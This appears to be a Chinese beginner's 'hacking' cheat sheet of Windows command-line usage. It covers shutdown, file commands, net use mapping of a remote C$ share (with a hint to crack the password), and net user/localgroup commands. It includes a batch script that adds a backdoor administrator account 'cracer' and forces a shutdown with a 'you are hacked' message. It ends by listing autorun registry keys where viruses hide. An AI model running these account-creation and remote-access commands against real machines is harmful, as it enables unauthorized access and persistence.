Hack常用的信息安全命令（2）win系统

shutdown -s -t 180 -c “输入一段你要说的文本”

• shutdown -a（取消这个关机）
• -s 关机
• -r 重启
• -t 倒计时
• -c “输入文本”

写成一个.bat文件

copy con c:\123.txt 创建新文件

• 按一下Ctrl+z，松开后enter，新文件编写内容完成

md 创建目录

rd删除文件夹

del 文件名

ren 原文件名 新文件名 重命名命令

type 命令行下查看文件

start 启动或者打开文件

---

net use k: \\192.168.85.110\c$ 把110这个ip的电脑C盘，映射到我们的K盘（前提要ping通，再输入用户名和密码，就可以登录，否则工具破解）

net use k: \\192.168.85.110\c$ /del 断开这个映射

net start 查看开了哪些服务

net start 服务名，开启服务，停止就用stop

---

以下命令重要

net user 查看有哪些账户，和账户属性 
net user cracer 123 /add 创建一个cracer的用户密码是123（这个一般会被拦截）
net localgroup administrators cracer /add(提权cracer这个用户加入管理员组）
net user cracer /del（删除这个用户）
net user guset /active:yes (激活guest用户） 
net share （查看本地开启的共享）

写个提权的批处理文件
c:\>copy con c:\123.bat
net user cracer 123 /add
net localgroup administrators cracer /add
shutdown -s -t 180 -c "you are hacked by cracer" (ctrl+z)回车后文件编写完成
生成123.bat的关机文件，并创建了个cracer的黑客用户，权限赋予了管理员组的管理员的权限

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

• 经常检查这3个注册表内容，病毒喜欢待得地方

---